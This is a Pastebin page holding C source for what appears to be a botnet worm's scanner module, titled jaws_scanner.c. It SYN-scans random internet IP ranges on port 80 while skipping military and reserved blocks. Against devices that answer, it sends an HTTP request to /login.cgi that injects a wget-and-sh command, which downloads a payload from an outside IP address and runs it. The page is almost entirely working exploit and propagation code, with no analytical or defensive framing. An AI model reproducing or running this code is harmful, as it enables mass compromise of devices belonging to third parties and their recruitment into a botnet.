API tools faq
paste
Guest User

jaws_scanner.c

a guest
Feb 26th, 2020
326
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.87 KB | None | 0 0
raw download clone embed print report
  1. #ifdef SD
  2.  
  3. #define _GNU_SOURCE
  4.  
  5. #ifdef DEBUG
  6. #include <stdio.h>
  7. #endif
  8. #include <unistd.h>
  9. #include <stdlib.h>
  10. #include <sys/socket.h>
  11. #include <arpa/inet.h>
  12. #include <sys/select.h>
  13. #include <sys/types.h>
  14. #include <time.h>
  15. #include <fcntl.h>
  16. #include <signal.h>
  17. #include <errno.h>
  18. #include <string.h>
  19. #include <linux/ip.h>
  20. #include <linux/tcp.h>
  21.  
  22. #include "includes.h"
  23. #include "dlink_scanner.h"
  24. #include "table.h"
  25. #include "rand.h"
  26. #include "util.h"
  27. #include "checksum.h"
  28.  
  29. int dlink_scanner_pid = 0, dlink_rsck = 0, dlink_rsck_out = 0, dlink_auth_table_len = 0;
  30. char dlink_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};
  31. struct dlink_scanner_auth *dlink_auth_table = NULL;
  32. struct dlink_scanner_connection *conn_table;
  33. uint16_t dlink_dlink_auth_table_max_weight = 0;
  34. uint32_t dlink_fake_time = 0;
  35. int dlink_range[] = {2,178,62,213,178,176,201,101,119};
  36.  
  37. int dlink_recv_strip_null(int sock, void *buf, int len, int flags)
  38. {
  39. int ret = recv(sock, buf, len, flags);
  40.  
  41. if(ret > 0)
  42. {
  43. int i = 0;
  44.  
  45. for(i = 0; i < ret; i++)
  46. {
  47. if(((char *)buf)[i] == 0x00)
  48. {
  49. ((char *)buf)[i] = 'A';
  50. }
  51. }
  52. }
  53.  
  54. return ret;
  55. }
  56.  
  57. void dlink_scanner(void)
  58. {
  59. int i = 0, x;
  60. uint16_t source_port;
  61. struct iphdr *iph;
  62. struct tcphdr *tcph;
  63.  
  64. // Let parent continue on main thread
  65. dlink_scanner_pid = fork();
  66. if(dlink_scanner_pid > 0 || dlink_scanner_pid == -1)
  67. return;
  68.  
  69. LOCAL_ADDR = util_local_addr();
  70.  
  71. rand_init();
  72. dlink_fake_time = time(NULL);
  73. conn_table = calloc(DLINK_SCANNER_MAX_CONNS, sizeof(struct dlink_scanner_connection));
  74. for(i = 0; i < DLINK_SCANNER_MAX_CONNS; i++)
  75. {
  76. conn_table[i].state = DLINK_SC_CLOSED;
  77. conn_table[i].fd = -1;
  78. conn_table[i].credential_index = 0;
  79. }
  80.  
  81. // Set up raw socket scanning and payload
  82. if((dlink_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
  83. {
  84. #ifdef DEBUG
  85. printf("[scanner] failed to initialize raw socket, cannot scan\n");
  86. #endif
  87. exit(0);
  88. }
  89. fcntl(dlink_rsck, F_SETFL, O_NONBLOCK | fcntl(dlink_rsck, F_GETFL, 0));
  90. i = 1;
  91. if(setsockopt(dlink_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)
  92. {
  93. #ifdef DEBUG
  94. printf("[scanner] failed to set IP_HDRINCL, cannot scan\n");
  95. #endif
  96. close(dlink_rsck);
  97. exit(0);
  98. }
  99.  
  100. do
  101. {
  102. source_port = rand_next() & 0xffff;
  103. }
  104. while(ntohs(source_port) < 1024);
  105.  
  106. iph = (struct iphdr *)dlink_scanner_rawpkt;
  107. tcph = (struct tcphdr *)(iph + 1);
  108.  
  109. // Set up IPv4 header
  110. iph->ihl = 5;
  111. iph->version = 4;
  112. iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));
  113. iph->id = rand_next();
  114. iph->ttl = 64;
  115. iph->protocol = IPPROTO_TCP;
  116.  
  117. // Set up TCP header
  118. tcph->dest = htons(80);
  119. tcph->source = source_port;
  120. tcph->doff = 5;
  121. tcph->window = rand_next() & 0xffff;
  122. tcph->syn = TRUE;
  123.  
  124. #ifdef DEBUG
  125. printf("[scanner] scanner process initialized. scanning started.\n");
  126. #endif
  127.  
  128. // Main logic loop
  129. while(TRUE)
  130. {
  131. fd_set fdset_rd, fdset_wr;
  132. struct dlink_scanner_connection *conn;
  133. struct timeval tim;
  134. int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;
  135.  
  136. // Spew out SYN to try and get a response
  137. if(dlink_fake_time != last_spew)
  138. {
  139. last_spew = dlink_fake_time;
  140.  
  141. for(i = 0; i < DLINK_SCANNER_RAW_PPS; i++)
  142. {
  143. struct sockaddr_in paddr = {0};
  144. struct iphdr *iph = (struct iphdr *)dlink_scanner_rawpkt;
  145. struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
  146.  
  147. iph->id = rand_next();
  148. iph->saddr = LOCAL_ADDR;
  149. iph->daddr = get_random_dlink_ip();
  150. iph->check = 0;
  151. iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));
  152.  
  153. tcph->dest = htons(80);
  154. tcph->seq = iph->daddr;
  155. tcph->check = 0;
  156. tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));
  157.  
  158. paddr.sin_family = AF_INET;
  159. paddr.sin_addr.s_addr = iph->daddr;
  160. paddr.sin_port = tcph->dest;
  161.  
  162. sendto(dlink_rsck, dlink_scanner_rawpkt, sizeof(dlink_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));
  163. }
  164. }
  165.  
  166. // Read packets from raw socket to get SYN+ACKs
  167. last_avail_conn = 0;
  168. while(TRUE)
  169. {
  170. int n = 0;
  171. char dgram[1514];
  172. struct iphdr *iph = (struct iphdr *)dgram;
  173. struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
  174. struct dlink_scanner_connection *conn;
  175.  
  176. errno = 0;
  177. n = recvfrom(dlink_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);
  178. if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
  179. break;
  180.  
  181. if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))
  182. continue;
  183. if(iph->daddr != LOCAL_ADDR)
  184. continue;
  185. if(iph->protocol != IPPROTO_TCP)
  186. continue;
  187. if(tcph->source != htons(80))
  188. continue;
  189. if(tcph->dest != source_port)
  190. continue;
  191. if(!tcph->syn)
  192. continue;
  193. if(!tcph->ack)
  194. continue;
  195. if(tcph->rst)
  196. continue;
  197. if(tcph->fin)
  198. continue;
  199. if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
  200. continue;
  201.  
  202. conn = NULL;
  203. for(n = last_avail_conn; n < DLINK_SCANNER_MAX_CONNS; n++)
  204. {
  205. if(conn_table[n].state == DLINK_SC_CLOSED)
  206. {
  207. conn = &conn_table[n];
  208. last_avail_conn = n;
  209. break;
  210. }
  211. }
  212.  
  213. // If there were no slots, then no point reading any more
  214. if(conn == NULL)
  215. break;
  216.  
  217. conn->dst_addr = iph->saddr;
  218. conn->dst_port = tcph->source;
  219. dlink_setup_connection(conn);
  220. }
  221.  
  222. FD_ZERO(&fdset_rd);
  223. FD_ZERO(&fdset_wr);
  224.  
  225. for(i = 0; i < DLINK_SCANNER_MAX_CONNS; i++)
  226. {
  227. int timeout = 5;
  228.  
  229. conn = &conn_table[i];
  230. //timeout = (conn->state > DLINK_DLINK_SC_CONNECTING ? 30 : 5);
  231.  
  232. if(conn->state != DLINK_SC_CLOSED && (dlink_fake_time - conn->last_recv) > timeout)
  233. {
  234. #ifdef DEBUG
  235. printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);
  236. #endif
  237.  
  238. close(conn->fd);
  239. conn->fd = -1;
  240. conn->state = DLINK_SC_CLOSED;
  241. free(conn->credentials);
  242. conn->credential_index = 0;
  243. util_zero(conn->rdbuf, sizeof(conn->rdbuf));
  244.  
  245. continue;
  246. }
  247.  
  248. if(conn->state == DLINK_DLINK_SC_CONNECTING || conn->state == DLINK_SC_EXPLOIT_STAGE2 || conn->state == DLINK_SC_EXPLOIT_STAGE3)
  249. {
  250. FD_SET(conn->fd, &fdset_wr);
  251. if(conn->fd > mfd_wr)
  252. mfd_wr = conn->fd;
  253. }
  254. else if(conn->state != DLINK_SC_CLOSED)
  255. {
  256. FD_SET(conn->fd, &fdset_rd);
  257. if(conn->fd > mfd_rd)
  258. mfd_rd = conn->fd;
  259. }
  260. }
  261.  
  262. tim.tv_usec = 0;
  263. tim.tv_sec = 1;
  264. nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
  265. dlink_fake_time = time(NULL);
  266.  
  267. for(i = 0; i < DLINK_SCANNER_MAX_CONNS; i++)
  268. {
  269. conn = &conn_table[i];
  270.  
  271. if(conn->fd == -1)
  272. continue;
  273.  
  274. if(FD_ISSET(conn->fd, &fdset_wr))
  275. {
  276. int err = 0, ret = 0;
  277. socklen_t err_len = sizeof(err);
  278.  
  279. ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
  280. if(err == 0 && ret == 0)
  281. {
  282.  
  283. if(conn->state == DLINK_SC_EXPLOIT_STAGE2)
  284. {
  285. #ifdef DEBUG
  286. printf("[scanner] FD%d request sent to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);
  287. #endif
  288.  
  289. // build stage 2 payload
  290. util_strcpy(conn->payload_buf, "GET /login.cgi?cli=aa%20aa%27;wget%20http://194.182.65.56/dfag%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27$ HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\n\r\n");
  291.  
  292. // actually send the payload
  293. send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);
  294.  
  295. // clear the payload buffer
  296. util_zero(conn->payload_buf, sizeof(conn->payload_buf));
  297.  
  298. // clear the socket buffer
  299. util_zero(conn->rdbuf, sizeof(conn->rdbuf));
  300.  
  301. conn->state = DLINK_SC_CLOSED;
  302. close(conn->fd);
  303. conn->fd = -1;
  304.  
  305. continue;
  306. }
  307. else if(conn->state == DLINK_SC_EXPLOIT_STAGE3)
  308. {
  309. conn->state = DLINK_SC_CLOSED;
  310.  
  311. continue;
  312. }
  313. else
  314. {
  315. conn->credentials = malloc(256);
  316. conn->state = DLINK_SC_EXPLOIT_STAGE2;
  317. }
  318. }
  319. else
  320. {
  321. #ifdef DEBUG
  322. printf("[scanner] FD%d error while connecting = %d\n", conn->fd, err);
  323. #endif
  324.  
  325. close(conn->fd);
  326. conn->fd = -1;
  327. conn->state = DLINK_SC_CLOSED;
  328.  
  329. continue;
  330. }
  331. }
  332.  
  333. if(FD_ISSET(conn->fd, &fdset_rd))
  334. {
  335. while(TRUE)
  336. {
  337. int ret = 0;
  338.  
  339. if(conn->state == DLINK_SC_CLOSED)
  340. break;
  341. close(conn->fd);
  342.  
  343. if(conn->rdbuf_pos == DLINK_SCANNER_RDBUF_SIZE)
  344. {
  345. memmove(conn->rdbuf, conn->rdbuf + DLINK_SCANNER_HACK_DRAIN, DLINK_SCANNER_RDBUF_SIZE - DLINK_SCANNER_HACK_DRAIN);
  346. conn->rdbuf_pos -= DLINK_SCANNER_HACK_DRAIN;
  347. }
  348.  
  349. errno = 0;
  350. ret = dlink_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, DLINK_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
  351. if(ret == 0)
  352. {
  353. #ifdef DEBUG
  354. printf("[scanner] FD%d connection gracefully closed (stage %d)\n", conn->fd, conn->state);
  355. #endif
  356. errno = ECONNRESET;
  357. ret = -1;
  358. }
  359. if(ret == -1)
  360. {
  361. if(errno != EAGAIN && errno != EWOULDBLOCK)
  362. {
  363. if(conn->state == DLINK_SC_EXPLOIT_STAGE2)
  364. {
  365. #ifdef DEBUG
  366. printf("[scanner] FD%d resetting connection preparing to continue with stage 2 of the exploit\n", conn->fd);
  367. #endif
  368. close(conn->fd);
  369. dlink_setup_connection(conn);
  370. continue;
  371. }
  372.  
  373. close(conn->fd);
  374. conn->fd = -1;
  375. conn->state = DLINK_SC_CLOSED;
  376. free(conn->credentials);
  377. conn->credential_index = 0;
  378. util_zero(conn->rdbuf, sizeof(conn->rdbuf));
  379. }
  380. break;
  381. }
  382.  
  383. conn->rdbuf_pos += ret;
  384. conn->last_recv = dlink_fake_time;
  385.  
  386. int len = util_strlen(conn->rdbuf);
  387. conn->rdbuf[len] = 0;
  388.  
  389. if(conn->state == DLINK_SC_GET_CREDENTIALS)
  390. {
  391. char *out = strtok(conn->rdbuf, " ");
  392.  
  393. while(out != NULL)
  394. {
  395. if(strstr(out, ""))
  396. {
  397. #ifdef DEBUG
  398. printf("[scanner] FD%d parsing credentials...\n", conn->fd);
  399. #endif
  400.  
  401. memmove(out, out + 11, strlen(out));
  402.  
  403. int i = 0;
  404.  
  405. for(i = 0; i < strlen(out); i++)
  406. {
  407. if(out[i] == ';' || out[i] == '"' || out[i] == ' ')
  408. out[i] = 0;
  409. }
  410.  
  411. conn->credentials[conn->credential_index] = strdup(out);
  412. conn->credential_index++;
  413.  
  414. }
  415.  
  416. out = strtok(NULL, " ");
  417. }
  418. }
  419.  
  420. if(conn->credentials[0] == NULL && conn->credentials[1] == NULL)
  421. {
  422. #ifdef DEBUG
  423. printf("[scanner] FD%d failed to retrieve credentials\n", conn->fd);
  424. #endif
  425. close(conn->fd);
  426. conn->fd = -1;
  427. conn->state = DLINK_SC_CLOSED;
  428. free(conn->credentials);
  429. conn->credential_index = 0;
  430. util_zero(conn->rdbuf, sizeof(conn->rdbuf));
  431. }
  432. else
  433. {
  434. #ifdef DEBUG
  435. printf("[scanner] FD%d retrieved user: %s, pass: %s changing exploit stages\n", conn->fd, conn->credentials[0], conn->credentials[1]);
  436. #endif
  437.  
  438. close(conn->fd);
  439. conn->fd = -1;
  440. conn->state = DLINK_SC_EXPLOIT_STAGE2;
  441. conn->credential_index = 0;
  442. util_zero(conn->rdbuf, sizeof(conn->rdbuf));
  443. }
  444. }
  445. }
  446. }
  447. }
  448. }
  449.  
  450. void dlink_kill(void)
  451. {
  452. kill(dlink_scanner_pid, 9);
  453. }
  454.  
  455. static void dlink_setup_connection(struct dlink_scanner_connection *conn)
  456. {
  457. struct sockaddr_in addr = {0};
  458.  
  459. if(conn->fd != -1)
  460. close(conn->fd);
  461.  
  462. if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  463. {
  464. #ifdef DEBUG
  465. printf("[scanner] failed to call socket()\n");
  466. #endif
  467. return;
  468. }
  469.  
  470. conn->rdbuf_pos = 0;
  471. util_zero(conn->rdbuf, sizeof(conn->rdbuf));
  472.  
  473. fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
  474.  
  475. addr.sin_family = AF_INET;
  476. addr.sin_addr.s_addr = conn->dst_addr;
  477. addr.sin_port = conn->dst_port;
  478.  
  479. conn->last_recv = dlink_fake_time;
  480.  
  481. if(conn->state == DLINK_SC_EXPLOIT_STAGE2 || conn->state == DLINK_SC_EXPLOIT_STAGE3)
  482. {
  483. }
  484. else
  485. {
  486. conn->state = DLINK_DLINK_SC_CONNECTING;
  487. }
  488.  
  489. connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
  490. }
  491.  
  492. static ipv4_t get_random_dlink_ip(void)
  493. {
  494. uint32_t tmp;
  495. uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;
  496.  
  497. do
  498. {//dlink_range
  499. tmp = rand_next();
  500. srand(time(NULL));
  501.  
  502. int dcock = rand() % (sizeof(dlink_range)/sizeof(char *));
  503.  
  504. o1 = dlink_range[dcock];
  505. o2 = (tmp >> 8) & 0xff;
  506. o3 = (tmp >> 16) & 0xff;
  507. o4 = (tmp >> 24) & 0xff;
  508. }
  509. while(o1 == 127 || // 127.0.0.0/8 - Loopback
  510. (o1 == 0) || // 0.0.0.0/8 - Invalid address space
  511. (o1 == 3) || // 3.0.0.0/8 - General Electric Company
  512. (o1 == 15 || o1 == 16) || // 15.0.0.0/7 - Hewlett-Packard Company
  513. (o1 == 56) || // 56.0.0.0/8 - US Postal Service
  514. (o1 == 10) || // 10.0.0.0/8 - Internal network
  515. (o1 == 192 && o2 == 168) || // 192.168.0.0/16 - Internal network
  516. (o1 == 172 && o2 >= 16 && o2 < 32) || // 172.16.0.0/14 - Internal network
  517. (o1 == 100 && o2 >= 64 && o2 < 127) || // 100.64.0.0/10 - IANA NAT reserved
  518. (o1 == 169 && o2 > 254) || // 169.254.0.0/16 - IANA NAT reserved
  519. (o1 == 198 && o2 >= 18 && o2 < 20) || // 198.18.0.0/15 - IANA Special use
  520. (o1 >= 224) || // 224.*.*.*+ - Multicast
  521. (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
  522. );
  523.  
  524. return INET_ADDR(o1,o2,o3,o4);
  525. }
  526.  
  527. #endif
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!